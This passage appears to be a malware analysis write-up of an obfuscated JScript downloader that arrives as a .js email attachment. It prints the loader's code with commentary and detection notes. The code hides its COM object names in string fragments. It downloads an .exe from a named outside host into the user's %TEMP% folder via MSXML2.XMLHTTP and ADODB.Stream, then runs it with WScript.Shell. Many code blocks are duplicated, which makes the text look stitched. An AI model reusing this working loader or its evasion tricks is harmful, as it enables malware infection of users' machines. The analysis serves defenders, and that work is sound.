    "E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"), 

    "" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"), 
    "" + "." + ("followed", "casting", "second", "exe"), 
    ("including", "enemy", "R") + "un", 

    ("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct", 

    "nlHcwmmYdvD", 
    "HCpQSg", 

    "W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"), 

    "LVEhhuKWtV", 

    ("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"), 

    "BHyXGt", 

    "V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"), 
    ("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
                
                ];    // see img BilRTKUok-01.JPG: the array after all the string expressions have been evaluated

Line 06: Even though the BilRTKUok array is full of meaningless filler words, once its expressions are evaluated it becomes what is shown below in Fig: BilRTKUok-01.JPG. (In JavaScript the comma operator evaluates to its last operand, so each parenthesised list of words collapses to its final string.)

BilRTKUok Array Snapshot
Fig: BilRTKUok-01.JPG

// thickI is still 0 here, so this is splice(7, 2): it drops the two filler entries
// "nlHcwmmYdvD" and "HCpQSg" so the real strings shift into the indices used later.
BilRTKUok.splice(7, thickI + 2);   // After splice removes 2 items; see img BilRTKUok-02.JPG
// thickI is still 0 here, so this is splice(7, 2): it drops the two filler entries
// "nlHcwmmYdvD" and "HCpQSg" so the real strings shift into the indices used later.
BilRTKUok.splice(7, thickI + 2);   // After splice removes 2 items; see img BilRTKUok-02.JPG

After the splicing of the BilRTKUok array, it becomes as shown in below Fig: BilRTKUok-02.JPG

Snapshot of BilRTKUok array after splice
Fig: BilRTKUok-02.JPG

// Recover the real COM class name and two single letters that later spell method
// names. Indirecting through this[...] keeps the literal "ActiveXObject" out of the
// file, which is what defeats naive string-based attachment filters.
amino = BilRTKUok[1 + 4 + 1].split("condo").join("");  // BilRTKUok[6] with "condo" removed = "ActiveXObject"
//var WUHOHMfe = this["ActiveXObject"];
var WUHOHMfe = this[amino];   // lookup on the global object: the ActiveXObject constructor
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery();           // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); //  announcements = "s"
thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2];   // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY";                          //  BilRTKUok[8] = "kAgWlwsNfXY" (filler, removed again by the next splice)
BilRTKUok.splice(thickI + 1, thickI - 4);   // splice(8, 3): removes THREE items (indices 8-10), not 2, leaving [8] = "VmeVYVS" and [9] = the MSXML2.XMLHTTP string; see img BilRTKUok-03.JPG
// Recover the real COM class name and two single letters that later spell method
// names. Indirecting through this[...] keeps the literal "ActiveXObject" out of the
// file, which is what defeats naive string-based attachment filters.
amino = BilRTKUok[1 + 4 + 1].split("condo").join("");  // BilRTKUok[6] with "condo" removed = "ActiveXObject"

//var WUHOHMfe = this["ActiveXObject"]; 
var WUHOHMfe = this[amino];   // lookup on the global object: the ActiveXObject constructor
statement = (("savings", "perfidy", "qHgSeaxuhoE", "hormone", "pSCfJszNMe") + "xJwXsnxn").millinery();           // statement = "p"
announcements = (("linking", "scholastic", "JgndJbrQuz", "timely", "shWLaSRGCWke") + "MRkwwfHjVT").millinery(); //  announcements = "s"

thickI = 7;
BilRTKUok[thickI] = BilRTKUok[thickI] + BilRTKUok[thickI + 2];   // BilRTKUok[7] = "WSccondoriptcondo.Shcondoelcondol"
BilRTKUok[thickI + 1] = "kAgWlwsNfXY";                          //  BilRTKUok[8] = "kAgWlwsNfXY" (filler, removed again by the next splice)
BilRTKUok.splice(thickI + 1, thickI - 4);   // splice(8, 3): removes THREE items (indices 8-10), not 2, leaving [8] = "VmeVYVS" and [9] = the MSXML2.XMLHTTP string; see img BilRTKUok-03.JPG


line 36 : The ActiveXObject object is used to create instances of OLE Automation objects in Internet Explorer on Windows operating systems.

Several applications (Microsoft Office Word, Microsoft Office Excel, Windows Media Player, ...) provide OLE Automation objects to allow communication with them. You can use the methods and properties supported by Automation objects in JavaScript.

Luckily, the ActiveXObject object is only supported by Internet Explorer. To know more on ActiveXObject, check this site

Line 57: After this code, the array becomes as shown in Fig: BilRTKUok-03.JPG below


Fig: BilRTKUok-03.JPG


// Instantiate the COM objects the loader needs. Detection note: a script host
// (wscript.exe / cscript.exe) started from a mail client or archive viewer that
// creates WScript.Shell, MSXML2.XMLHTTP and, shortly after, ADODB.Stream is a
// strong indicator of this kind of downloader. Scripts like this one arrive as
// .js attachments (here inside a ZIP), so changing the default handler for .js
// files away from Windows Script Host is a cheap mitigation on user desktops.
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join("");   // thickI is 7: "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"
//var yzavYsf = new ActiveXObject("WScript.Shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);   // the shell object later used to Run the dropped file
thickI++;                                               // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join("");  // BilRTKUok[9]: "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"
//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP");
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);   // the HTTP client used to fetch the payload
thickI /= 2;                // thickI = 4, so [thickI - 2] is "ExpandEnvironmentStrings" and [thickI - 1] is "%TEMP%"
//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%")
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]);   // absolute path of the user's TEMP folder: the drop directory
corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery();   // corporatee = "E" (first character of "ElpAWvfzTpDEqAkzD")
// Instantiate the COM objects the loader needs. Detection note: a script host
// (wscript.exe / cscript.exe) started from a mail client or archive viewer that
// creates WScript.Shell, MSXML2.XMLHTTP and, shortly after, ADODB.Stream is a
// strong indicator of this kind of downloader. Scripts like this one arrive as
// .js attachments (here inside a ZIP), so changing the default handler for .js
// files away from Windows Script Host is a cheap mitigation on user desktops.
BilRTKUok[thickI] = BilRTKUok[thickI].split("condo").join("");   // thickI is 7: "WSccondoriptcondo.Shcondoelcondol" is converted to "WScript.Shell"

//var yzavYsf = new ActiveXObject("WScript.Shell");
var yzavYsf = new WUHOHMfe(BilRTKUok[thickI]);   // the shell object later used to Run the dropped file
thickI++;                                               // thickI = 8
BilRTKUok[thickI + 1] = BilRTKUok[thickI + 1].split("condo").join("");  // BilRTKUok[9]: "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" becomes "MSXML2.XMLHTTP"

//var QcarAWR = new ActiveXObject("MSXML2.XMLHTTP"); 
var QcarAWR = new WUHOHMfe(BilRTKUok[1 + thickI]);   // the HTTP client used to fetch the payload
thickI /= 2;                // thickI = 4, so [thickI - 2] is "ExpandEnvironmentStrings" and [thickI - 1] is "%TEMP%"

//var xAbMqtec = WshShell.ExpandEnvironmentStrings("%TEMP%") 
var xAbMqtec = yzavYsf[BilRTKUok[thickI - 2]](BilRTKUok[thickI - 1]);   // absolute path of the user's TEMP folder: the drop directory


corporatee = (( "mechanics", "seraphic", "TyEzvHbHt", "disorders", "ElpAWvfz") + "TpDEqAkzD").millinery();   // corporatee = "E" (first character of "ElpAWvfzTpDEqAkzD")




line 48 :   What is WSH?    WSH is a script host. A script host is a program that provides an environment in which users can execute scripts in a variety of languages, languages that use a variety of object models to perform tasks.  To Read more, check this site

The WshShell object gives your scripts the ability to work with the Windows shell. Your scripts can use the WshShell object to perform a number of system administration tasks, including running programs, reading from and writing to the registry, and creating shortcuts.

line 53 : The MSXML2.XMLHTTP is the XML HTTP Request Object used to call Server APIs Asynchronously.

line 57 : The ExpandEnvironmentStrings method expands the environment variables in a string and returns the resulting string. Here its gives the absolute path of %TEMP% .To know more, check this site
// Stage-2 trigger: the first argument assembles the payload URL from fragments so
// it never appears as one string (the evaluated value is noted inside screensaver);
// the second is the base name of the .exe that will be dropped in %TEMP%.
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + "exe", "FfXlke");
// Stage-2 trigger: the first argument assembles the payload URL from fragments so
// it never appears as one string (the evaluated value is noted inside screensaver);
// the second is the base name of the .exe that will be dropped in %TEMP%.
screensaver("h" + "tt" + ("photographic", "baleful", "formality", "p:") + "//" + "de" + "v." + "fa" + "nj" + "ap" + "an" + ".c" + ("edification", "goodfellowship", "om") + "/7" + "62" + "tr" + "g22e" + "2." + "exe", "FfXlke");

Line 113: Don't let the function name deceive you, it is no screensaver function. In summary, this custom function calls the server, downloads the virus payload into a file and tells the system to run that file.

// Stage 2 - fetch and execute. Everything a defender needs to recognise this
// loader is here: a synchronous HTTP GET of an .exe, ADODB.Stream writing the
// bytes under the expanded %TEMP% path, then WScript.Shell.Run on the dropped
// file. Method names are assembled from fragments so the literal strings never
// appear in the script body; the comments give each evaluated value.
function screensaver(aristocrat, welter) {
// aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe"  (payload URL, deliberately defanged with spaces - treat as an IoC, do not visit)
// welter = "FfXlke"  (base name of the file dropped in %TEMP%)
    try {
        var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI];   // xAbMqtec is the expanded %TEMP% path and BilRTKUok[4] is ".exe": "<TEMP>/FfXlke.exe"
        var open ="o" + statement + corporatee + "n";                // "opEn" - COM method lookup is case-insensitive, so this still reaches open()
        var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // "GET"
         
        // MSXML2.XMLHTTP.open("GET", <payload URL>, false) - the false makes the request synchronous
        QcarAWR[open](meth, aristocrat, false);
         
        var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery();  // "s" + "e" + "n" + "d" = "send"
        QcarAWR[func2]();  // MSXML2.XMLHTTP.send(); blocks until the response arrives because the request is synchronous
         
        if (QcarAWR.status == 200) {
            var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D");  // "ApODB.Stream" with "p" -> "D" = "ADODB.Stream"
             
            // var hytSjp = new ActiveXObject("ADODB.Stream");  - the object used to write binary data to disk
            var hytSjp = new WUHOHMfe(func3);
             
            var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen");    // "open"
            
           //ADODB.Stream.open();
            hytSjp[func4]();
             
            hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1 (adTypeBinary): the response is handled as raw bytes
            var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" // "write"
            var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy";   // "ResponseBody"
             
            //ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody); - the downloaded bytes go into the stream
            hytSjp[func5](QcarAWR[func6]);
             
            var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // "poDition" with "D" -> "s" = "position"
            hytSjp[func7] = 0;  // ADODB.Stream.position = 0 - rewind before saving
           var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile");  // "saveToFile"
            
           // ADODB.Stream.saveToFile(transmit, 2 = adSaveCreateOverWrite): the payload now exists on disk in %TEMP%
            hytSjp[func8](transmit, 2);
            hytSjp.close();  // ADODB.Stream.close();
             
            // WScript.Shell.Run(transmit, 1, false): BilRTKUok[5] is "Run"; 1 = normal window, false = do not wait.
            // This is the moment to alert on: a script host launching a freshly written executable from %TEMP%.
            yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo");  // the comparison of two different literals is just an obfuscated false
        }
    }
    catch (cNINLnxTF) {
    console.log(cNINLnxTF);   // Under WSH there is no console object, so an error reaching here would itself throw; failures are effectively silent
    };
}
// Stage 2 - fetch and execute. Everything a defender needs to recognise this
// loader is here: a synchronous HTTP GET of an .exe, ADODB.Stream writing the
// bytes under the expanded %TEMP% path, then WScript.Shell.Run on the dropped
// file. Method names are assembled from fragments so the literal strings never
// appear in the script body; the comments give each evaluated value.
function screensaver(aristocrat, welter) {
// aristocrat = "http ://dev.fanjapan.com/762trg22e2 .exe"  (payload URL, deliberately defanged with spaces - treat as an IoC, do not visit)
// welter = "FfXlke"  (base name of the file dropped in %TEMP%)
    try {
        var transmit = xAbMqtec + "/" + welter + BilRTKUok[thickI];   // xAbMqtec is the expanded %TEMP% path and BilRTKUok[4] is ".exe": "<TEMP>/FfXlke.exe"
        var open ="o" + statement + corporatee + "n";                // "opEn" - COM method lookup is case-insensitive, so this still reaches open()
        var meth= ("improvement", "tardily", "G") + corporatee + ("rocco", "grapple", "tillage", "T"); // "GET"
        
        // MSXML2.XMLHTTP.open("GET", <payload URL>, false) - the false makes the request synchronous
        QcarAWR[open](meth, aristocrat, false);
        
        var func2= announcements + ("tuition", "glinting", "unfounded", "arctic", "e") + (("unholy", "curbed", "LLpUmwQBnsk", "spurn", "kissing", "nGDOpiDLl") + "FKfAxgifRdX").millinery() + (("computer", "snail", "races", "leicestershire", "archive", "dEAqcmjkU") + "KpOALvGVT").millinery();  // "s" + "e" + "n" + "d" = "send"
        QcarAWR[func2]();  // MSXML2.XMLHTTP.send(); blocks until the response arrives because the request is synchronous
        
        if (QcarAWR.status == 200) {
            var func3 = (("calibre", "hilton", "collectibles", "skating", "") + "A" + ("realistic", "invitations", "vulcan", "pO") + "DB." + "" + "S" + ("dwindle", "homework", "centered", "tr") + ("athletics", "dresses", "eam")).replace("p", "D");  // "ApODB.Stream" with "p" -> "D" = "ADODB.Stream"
            
            // var hytSjp = new ActiveXObject("ADODB.Stream");  - the object used to write binary data to disk
            var hytSjp = new WUHOHMfe(func3);
            
            var func4 = "" + "o" + ("fraternity", "manner", "simplified", "consent", "pen");    // "open"
           
           //ADODB.Stream.open();
            hytSjp[func4](); 
            
            hytSjp.type = 0 + 3 - 2; // ADODB.Stream.type = 1 (adTypeBinary): the response is handled as raw bytes
            var func5 = "w" + ("targets", "limply", "shell", "ri") + "te" ;  // "write"
            var func6 = "" + ("numeral", "drawl", "tasteful", "R") + "es" + ("defender", "typewriter", "accumulates", "necessitate", "pon") + announcements + ("carolina", "ravage", "malediction", "e") + "Bo" + "dy";   // "ResponseBody"
            
            //ADODB.Stream.write(MSXML2.XMLHTTP.ResponseBody); - the downloaded bytes go into the stream
            hytSjp[func5](QcarAWR[func6]);
            
            var func7 = (statement + "o" + "Di" + ("bracelet", "beast", "cheaper", "ti") + "on").replace("D", announcements); // "poDition" with "D" -> "s" = "position"
            hytSjp[func7] = 0;  // ADODB.Stream.position = 0 - rewind before saving
           var func8="s" + "av" + "eT" + ("scrimmage", "alliance", "oFile");  // "saveToFile"
           
           // ADODB.Stream.saveToFile(transmit, 2 = adSaveCreateOverWrite): the payload now exists on disk in %TEMP%
            hytSjp[func8](transmit, 2);
            hytSjp.close();  // ADODB.Stream.close();
            
            // WScript.Shell.Run(transmit, 1, false): BilRTKUok[5] is "Run"; 1 = normal window, false = do not wait.
            // This is the moment to alert on: a script host launching a freshly written executable from %TEMP%.
            yzavYsf[BilRTKUok[thickI + 1]](transmit, 1, "TPYHPf" === "LDNSGABujeo");  // the comparison of two different literals is just an obfuscated false
        }

    } 
    catch (cNINLnxTF) {
    console.log(cNINLnxTF);   // Under WSH there is no console object, so an error reaching here would itself throw; failures are effectively silent
    };

}

line 71 : sends Server API request to receive the Virus File

line 80 : the ADO Stream Object is used to read, write, and manage a stream of binary data or text. To know more, read here.
ADODB.Stream object is created to handle the binary data contents of the virus file.

line 80 : the contents of the virus file received via the XMLHttp Response object is written to the ADODB Stream.

line 99 : the ADODB Stream is saved to the file created in %TEMP% folder.

line 104 : the WshShell object is used to run the (Virus) file  created in the %TEMP% folder.



To see the full codebase, please check the github page here